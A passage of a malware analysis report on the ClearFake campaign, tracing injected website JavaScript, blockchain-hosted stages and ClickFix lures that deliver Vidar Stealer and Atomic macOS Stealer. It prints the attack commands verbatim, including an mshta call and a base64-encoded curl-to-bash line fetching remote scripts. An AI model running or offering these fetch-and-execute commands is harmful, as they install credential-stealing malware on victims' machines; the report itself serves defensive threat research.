3.1. Malicious JavaScript Code

The ClearFake campaign operates by injecting malicious JavaScript code into websites, causing the script to execute when a user visits the site. The JavaScript analyzed in this report is triggered upon accessing the website's main page. The core code was encoded, and after decoding and deobfuscating it, the malicious logic was revealed.

caption - Encoded malicious JavaScript code

When the JavaScript code is executed, it first overrides the main methods of the console object to prevent them from functioning properly.

caption - Routine for overriding console object methods

Next, the script retrieves and executes a payload from a smart contract deployed on the Binance Smart Chain (BSC).

Using the EtherHiding technique, the JavaScript code downloads and executes the next-stage malware. A total of three smart contracts are involved in this process, each defined as Stage1, Stage2, Stage3 contract.

3.2. Stage1 Contract

The address of the Stage1 contract is “0x9179dda8B285040Bf381AABb8a1f4a1b8c37Ed53”. In the JavaScript code, four functions are called from this contract using its ABI (Application Binary Interface).

caption - Stage1 contract ABI routine

To identify the functions defined in the ABI, we decompiled and analyzed the contract’s bytecode using Online Solidity Decompiler. While the ABI explicitly listed four functions, the decompilation revealed two additional functions not initially documented in the ABI.

caption - Functions Identified in Decompiled Stage1 Contract Bytecode (Not Present in the ABI)

The behavior of the functions identified from the decompiled bytecode of the Stage1 contract is detailed as below.

| Signature | Function Name | Required Permissions | Function Behaviors |
| --- | --- | --- | --- |
| 0x711452e6 | orchidABI | None | Returns the ABI of Stage2 contract |
| 0x59211f8f | orchidAddress | None | Returns the address of Stage2 contract |
| 0x8420b126 | merlionABI | None | Returns the ABI of Stage3 contract |
| 0x12dc3f4a | merlionAddress | None | Returns the address of Stage3 contract |
| 0xb24f585c | Not identifiable | Admin | Stores the input values as the ABI and address of the Stage2 contract. |
| 0x35725789 | Not identifiable | Admin | Stores the input values as the ABI and address of the Stage3 contract

caption - Functions of Stage1 contract

In the JavaScript code, the “orchidABI” and “orchidAddress” functions of the Stage1 contract are executed to retrieve the ABI and address of the Stage2 contract.

Once the ABI and address of the Stage2 contract are obtained, the script proceeds to call the “tokyoSkytree” function. The result of this function call is base64-decoded, gzip-decompressed and executed using eval.

caption - Stage2 contract ABI

3.3. Stage2 Contract

The address of the Stage2 contracts is “0x8FBA1667BEF5EdA433928b220886A830488549BD”. It is structured to store or return a JavaScript file that has been both gzip-compressed and base64-encoded.

caption - Decompiled Stage2 contract bytecode

Interestingly, all the functions in the Stage2 contract include names referencing landmarks in Japan. Based on analysis of the decompiled bytecode, the behavior of each function is detailed as below.

| Signature | Function Name | Access Rights | Action |
| --- | --- | --- | --- |
| 0x51bc047f | akihabaraLights | None | Returns the stored akihabaraLights |
| 0x0c36b675 | asakusaTemple | None | Returns the stored asakusaTemple |
| 0xfa3ba790 | ginzaLuxury | None | Returns the stored ginzaLuxury |
| 0x316f4063 | shibuyaCrossing | None | Returns the stored shibuyaCrossing |
| 0x432c42e5 | tokyoSkytree | None | Returns the stored tokyoSkytree |
| 0x416f2896 | setAkihabaraLights | Admin | Stores the input value to akihabaraLights |
| 0xa76e7648 | setAsakusaTemple | Admin | Stores the input value to asakusaTemple |
| 0xa98b06d3  | setGinzaLuxury | Admin | Stores the input value to ginzaLuxury |
| 0x1ba79aa2 | setShibuyaCrossing | Admin | Stores the input value to shibuyaCrossing |
| 0x9f7a7126 | setTokyoSkytree | Admin | Stores the input value to tokyoSkytree

caption - Functions of Stage2 contract

A total of five JavaScript files are stored in the Stage2 contract. The main file, “tokyoSkytree”, acts as the entry point and reads the other four files to execute them.

tokyoSkytree

The “tokyoSkytree” first checks if the cookie named not-robot exists. If the cookie is not present, it proceeds to read and execute the remaining JavaScript files in the following order.

• shibuyaCrossing

• akihabaraLights

• ginzaLuxury

• asakusaTemple

Once execution is complete, the script sets the not-robot cookie value to true with a 30-day expiration.

caption - Decoded tyokyoSkytree JavaScript file

shibuyaCrossing

The script checks the operating system information of the device accessing the website and stores it in the variable “sdTokyo”.

caption - Decoded shibuyaCrossing JavaScript file

The OS is identified by checking for specific substrings in the userAgent string. The following table lists the detectable operating systems and the corresponding substrings used for identification.

| OS | Substring |
| --- | --- |
| Windows | Win |
| MacOS | Mac |
| iOS | Mac and any of iPhone, iPad, iPod |
| Linux | Linux |
| Android | All of Linux, Android |
| ChromeOS | CrOS |
| PlayStation | PlayStation |
| Xbox | Xbox |
| Nintendo | Nintendo |
| BSD | BSD |
| Solaris | Any of SunOS, Solaris |
| Haiku | Haiku |
| webOS | webOS |
| Darwin | Darwin |
| QNX | QNX

caption - OS identifier strings

akihabaraLights

The script checks the web browser of the device accessing the website and stores it in the variable sdOsaka.

caption - Decoded akihabaraLights JavaScript file

Browser information is identified by checking the presence (and in some cases, absence) of specific substrings in the userAgent string. The following table lists the detectable browsers and their identifier strings. If none of the conditions are met, sdOsaka is assigned Unknown.

| Browser | Include string | Exclude string |
| --- | --- | --- |
| Google Chrome | Chrome | Edg |
| Mozilla Firefox | Firefox | None |
| Opera | Any of OPR, Opera | None |
| Microsoft Edge | Edg | None |
| Safari | Safari | Chrome |
| Internet Explorer | Any of MSIE, Trident | None

caption - Browser identifier strings

ginzaLuxury

The script retrieves the next-stage code from the Stage3 contract, decrypts it, and then executes it.

caption - AES-GCM decryption code of decoded ginzaLuxury

First, the script calls the “merlionAddress” and “merlionABI” functions from the Stage1 contract to obtain the ABI and address of the Stage3 contract.

caption - Stage3 contract ABI

Next, the script calls the getRandomSkylineByBrowserAndPlatform function from the Stage3 contract, passing in the collected browser and OS information as arguments.

The result of this function is a URL, which points to a location containing base64-encoded data.

caption - Data stored in the URL

The decryption process for the data stored at the retrieved URL proceeds as follows:

1. Base64-decode the data fetched from the URL.

2. Call the “pearlTower” function from the Stage3 contract and base64-decode its result.

3. Use the decoded result from “pearlTower” as the decryption key, and use the first 12 bytes of the previously decoded data as the IV.

4. Decrypt the remaining data using AES-GCM with the derived key and IV.

The decrypted content is an HTML file designed to leverage the ClickFix technique, which tricks the user into manually executing a command. This HTML file is ultimately displayed to the user visiting the compromised website.

asakusaTemple

“asakusaTemple” sends the userAgent information to hxxps://technavix[.]cloud

caption - Decoded asakusaTemple JavaScript file

3.4. Stage3 Contract

The Stage3 contract includes functions to store and retrieve various elements required for executing the ClickFix attack, including the ClickFix data URL, decryption key, the ClickFix command, and the current attack state. Among these, the ClickFix data URL is stored within a structure named “Shanghai.Skyline”. The data stored in this structure is as follows.

• ID

• URL

• Browser Information

• OS Information

• ClickFix Type

The behaviors of functions identified from the decompiled bytecode is as below.

| Signature | Function Name | Access Rights | Action |
| --- | --- | --- | --- |
| 0xbaf7bb8f | addSkyline | Admin | Stores input as Skyline structure. |
| 0xd11da92c | cityStatus | None | Returns current attack state. |
| 0x400a77ab | fallbackMessage | None | Returns stored message. |
| 0x128cfc44 | getAllSkylines | None | Returns all of the stored Skyline structures. |
| 0x75755384 | getRandomSkylineByBrowserAndPlatform | None | Returns a Skyline structure with matching Browser and OS information |
| 0x4724d397 | jadeCode | None | Returns stored decryption key. |
| 0x7799d770 | pearlTower | None | Returns stored ClickFix command. |
| 0xeb7a8223 | removeAllSkylines | Admin | Deletes all of the stored Skyline structures. |
| 0x6e575508 | removeSkylineById | Admin | Deletes a Skyline structure with a specific ID value. |
| 0xda4c3e46 | setCityStatus | Admin | Stores input as current attack state. |
| 0x7f996e6a | setFallbackMessage | Admin | Stores input as message. |
| 0x67685e3e | setJadeCode | Admin | Stores input as ClickFix command. |
| 0x167d1c4b | setPearlTower | Admin | Stores input as decryption key. |
| 0x4128180a | updateSkylinesById | Admin | Updates the URL value of a Skyline structure with a specific ID value

caption - Functions of Stage3 contract

All functions, except those that return stored content, require Admin privileges. As of July 14, 2025, the list of Skyline entries retrieved via the “getAllSkylines” function is shown in the table below.

| ID | URL | Browser | OS | ClickFix Type |
| --- | --- | --- | --- | --- |
| 0 | hxxps://yie-cpj[.]pages.dev/mac | Google Chrome | MacOS | Captcha |
| 1 | hxxps://yie-cpj[.]pages.dev/mac | Safari | MacOS | Captcha |
| 2 | hxxps://yie-cpj[.]pages.dev/mac | Mozilla Firefox | MacOS | Captcha |

caption - List of Skyline entries

The URL in each Skyline entry contains the encrypted HTML file previously mentioned under "ginzaLuxury." Once decrypted, the HTML file uses the ClickFix technique to trick users into executing a command.

The command is not visibly displayed on the website. Instead, it is automatically copied to the clipboard through embedded JavaScript in the HTML. The commands vary by operating system, and so far, versions for Windows and macOS have been identified.

3.5. Windows ClickFix

At the time of analysis, only a URL targeting macOS was present in the contract. However, through the transaction history on BSC, URLs targeting Windows was also identified.

caption - The transaction data for 0xa208b768a3b06c11a3483d5e5d89129bc114dc6a10f59bbab802e0ccd6997a90 containing a previously used Windows-specific URL

When the data stored at the URL is decrypted, it reveals an HTML file that mimics an error message, as shown in the image below. This file is designed to trick the user into manually executing a PowerShell command.

caption - Decrypted HTML displayed to the user

The PowerShell command is copied to the user's clipboard using the JavaScript code shown below.

caption - JavaScript code snippet that copies a PowerShell command to the user's clipboard

The PowerShell command copied to the clipboard is as follows.

• mshta hxxps://microsoft-dns-reload-1n.pages.dev

MSHTA Script

mshta.exe is a built-in Windows utility used to execute HTML Applications. In the attack, the PowerShell command issued by the attacker leverages mshta.exe to execute an HTML file hosted at “hxxps://microsoft-dns-reload-1n.pages.dev”.

caption - HTML file executed by mshta.exe

The HTML file contains VBScript code, where an embedded PowerShell command downloads and executes a file from a base64-encoded URL. The decoded URL is as follows.

• hxxps://raw.githubusercontent.com/wiraaji/improved-happiness/refs/heads/main/pc.txt

PowerShell Script

The file downloaded via VBScript is a PowerShell script. It downloads malware from GitHub, saves it in the Temp directory under a random name, and executes it. Then, sends the infected system’s IP address to “hxxps://saaadnesss.shop/connect”.

caption - PowerShell script code

RisingStrip.exe

RisingStrip.exe is an installer created with NSIS (Nullsoft Scriptable Install System). When executed, it creates an AutoIt executable and a compiled AutoIt script in the path “%LOCALAPPDATA%\Microsoft\Windows\INetCache\91531”.

caption - Generated AutoIt executable and compiled AutoIt script

The compiled AutoIt script contains an encrypted executable and shellcode stored as hexadecimal strings.

caption - Decompiled AutoIt script containing the encrypted Vidar Stealer.

The compiled AutoIt script executes shellcode using the DllCallAddress function. At that time, it passes the encrypted executable, and an RC4 key(46161468299921365240487271780856262) as arguments. The shellcode then decrypts the encrypted executable using the RC4 algorithm and executes it.

caption - RC4 PGRA function of the shellcode

The decrypted executable is a Vidar Stealer, and it is obfuscated using a technique in which most function addresses are calculated through operations on values stored in memory. These operations are primarily addition, designed so that the resulting address overflows the 4-byte integer range and wraps around—yielding the correct function address when treated as a 4-byte integer.

caption - Obfuscated start function of the Vidar Stealer

Most of the strings used are encrypted using 1-byte XOR operations. The length of the XOR key and its position vary for each string.

caption - String decrypting function

The C&C server address is retrieved from either a Telegram or Steam account. The malware first sends an HTTP request to the Telegram profile of user “w211et”. It then extracts the value following the string hu76a from the response data and uses it as the C&C server address. If the C&C address cannot be obtained via Telegram, the malware attempts to retrieve it from the Steam profile associated with the ID “76561199811540174”.

caption - Telegram account and Steam profile link found in the decrypted Vidar Stealer

If the C&C server address is successfully retrieved, the malware generates a unique system ID by combining the C drive volume serial number with the hardware profile information. This value is sent to the C&C server as hwid. A hardcoded value, f4c9ac30c7e86011d996b9b6076307b5, is also sent as the build_id.

At the time of analysis, the C&C server address had already been removed from both the Telegram and Steam profiles.

caption - Telegram link access screen

caption - Steam profile access screen

Afterward, the malware collects hardware information, installed programs, username, and other system details, then sends them to the C&C server as a file named information.txt. The contents of information.txt are as follows.

Version: 12.3

Date: <Local Time>
MachineID: <SOFTWARE\\Microsoft\\Cryptography\\MachineGuid>
GUID: <MachineGuid>
HWID: <System ID>

Path: <Malware Installed Path>
Work Dir: In memory

Windows: <Windows Version>
Install Date: Disabled
AV: Disabled
Computer Name: <Computer Name>
User Name: <User Name>
Display Resolution: <Display Size>
Keyboard Languages: <Keyboard Languages>
Local Time: <Local Time>
TimeZone: <TimeZone>

[Hardware]
Processor: <Processor Name>
Cores: <Number of Processor Cores>
Threads: <Number of Threads>
RAM: <Maximum RAM> MB
VideoCard: <VideoCard Name>

[Processes]
<List of Running Processes>

[Software]
<List of Installed Software>

After sending information.txt, the malware proceeds to collect and transmit additional data to the C&C server. The collected data are as follows.

| Browser info | WinSCP info | FileZilla info | Programs targeted for information collection |
| --- | --- | --- | --- |
| Chrome | HostName | HostName | Steam |
| Opera Stable | PortNumber | PortNumber | Discord |
| Opera GX | UserName | UserName | Telegram |
| FireFox | Password | Base64 Encoded Password | Azure

caption - Collected data

After transmitting all collected information, the malware executes the following command to delete itself and terminate the process.

• "C:\Windows\system32\cmd.exe" /c del /f /q "C:\ProgramData\<MalwarePath>" & timeout /t 11 & rd /s /q "C:\ProgramData\<MalwareFolder>" & exit

3.6. macOS ClickFix

The HTML file executed on macOS differs from the Windows version in that it prompts the user to prove they are not a robot by running the contents of their clipboard in the Terminal.

caption - HTML file execution result

Additionally, the “jadeCode” function of the Stage3 contract is used to retrieve the ClickFix command, which is then copied to the clipboard.

caption - HTML file executing jadeCode function

The command copied to the clipboard is as follows.

• echo 'L2Jpbi9iYXNoIC1jICIkKGN1cmwgLWZzU0wgaHR0cHM6Ly9lbnRyaW5pZGFkLmNmZC8xL3ZlcmlmeS5zaCki' | base64 -D | bash

Bash Command

When the ClickFix command is executed, it decodes a new command from base64 and runs it using bash. The decoded command is as follows.

• /bin/bash -c "$(curl -fsSL hxxps://entrinidad.cfd/1/verify.sh)”

The decoded command uses curl to fetch a script from “hxxps://entrinidad.cfd/1/verify.sh”. It then executes the retrieved content using bash.

verify.sh

The verify.sh script uses curl to download a file from “hxxps://overcasetv.cfd/update” and saves the file to “/tmp/update”. Then it uses xattr command to bypass security warning on execution. Finally it executes the file.

caption - verify.sh file content

/tmp/update

The downloaded “/tmp/update” file is an Atomic macOS Stealer (AMOS), a known infostealer malware targeting macOS systems. The string decoding process used in AMOS follows these steps.

1. The encoded string and two keys are read in 4-byte blocks.

2. From each 4-byte block, only the least significant byte (1 byte) is used and XORed with the first key.

3. The result of the XOR operation is then subtracted by the least significant byte of the second key.

4. The final result is decoded using a custom table base64 decoder.

AMOS executes a total of three commands using the system function.

The first command executed by AMOS checks whether it is running in a virtual machine, and if so, it terminates execution. The second command compresses and exfiltrates various types of sensitive data to the C&C server, including Username and password, Browser extensions, Cryptocurrency wallets, Browser cookies, Web login credentials, Telegram chat history and All files matching specific extensions. For a detailed list of the collected information, refer to “Appendix A. macOS ClickFix Collected Data”.

The final, third command executed is “disown; pkill Terminal” which terminates the process.